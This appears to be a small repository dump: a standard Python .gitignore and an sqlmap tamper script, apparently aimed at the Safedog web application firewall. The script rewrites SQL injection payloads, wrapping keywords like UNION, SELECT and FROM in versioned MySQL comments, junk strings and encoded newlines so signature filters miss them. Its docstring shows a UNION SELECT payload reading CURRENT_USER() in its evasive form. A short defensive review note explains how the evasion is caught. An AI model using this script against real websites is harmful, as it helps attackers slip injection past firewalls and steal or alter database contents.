├── .gitignore └── test_safedog_3.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | -------------------------------------------------------------------------------- /test_safedog_3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | 
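Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
*****************modify by Yuan-Yu Chen*************************
"""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS

__priority__ = PRIORITY.HIGHER


def dependencies():
    """Emit a one-time warning naming the DBMS version this script targets.

    The script name is derived from this file's basename with the extension
    stripped.
    """
    script_name = os.path.basename(__file__).split(".")[0]
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (script_name, DBMS.MYSQL))


def tamper(payload, **kwargs):
    """
    Encloses each keyword with versioned MySQL comment

    Requirement:
        * MySQL >= 5.1.13

    Tested against:
        * MySQL 5.1.56, 5.5.11

    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
        * Only words listed in kb.keywords and not listed in
          IGNORE_SPACE_AFFECTED_KEYWORDS are rewritten
        * The UNION / SELECT / FROM special cases compare case-sensitively,
          so lower-case spellings get the generic wrapper
        * A keyword at the very start of the payload is left alone, because
          the pattern requires a preceding non-word character
        * A falsy payload (None, '') is returned unchanged

    Review note (defensive):
        * The output relies on MySQL executing the body of /*! ... */
          comments while a signature-based filter treats them as inert.
          A filter that normalises such comments and decodes %0a before
          matching sees the plain keywords again; parameterized queries
          remove the injection point regardless of filter behaviour.

    >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
    '1/*!00000/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/UNION%0a/*!/**/ALL*//*!/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/SELECT%0a*//*!/**/NULL*/,/*!/**/NULL*/,/*!/**/CONCAT*/(/*!/**/CHAR*/(58,122,114,115,58),/*!/**/IFNULL*/(CAST(/*!/**/CURRENT_USER*/()/*!/**/AS*//*!/**/CHAR*/),/*!/**/CHAR*/(32)),/*!/**/CHAR*/(58,115,114,121,58))#'
    """

    # (prefix, suffix) placed around the keyword; keys are matched
    # case-sensitively, exactly as the original if/elif chain did.
    special_wrappers = {
        "UNION": ("/*!00000/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/", "%0a"),
        "SELECT": ("/*!/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/", "%0a*/"),
        "FROM": ("/*!00000/*|-^^^-|*/*/%0a", ""),
    }
    generic_wrapper = ("/*!/**/", "*/")

    def process(match):
        # The lookarounds in the pattern are zero-width, so the whole match
        # is exactly the 'word' group.
        word = match.group('word')
        upper = word.upper()
        if upper in kb.keywords and upper not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            prefix, suffix = special_wrappers.get(word, generic_wrapper)
            return prefix + word + suffix
        return match.group()

    retVal = payload

    if payload:
        # The group must be named 'word': process() reads it by that name,
        # and "(?P[" without a name is rejected by the re module.
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
        # Drop the spaces left next to the inserted comment delimiters.
        retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")

    return retVal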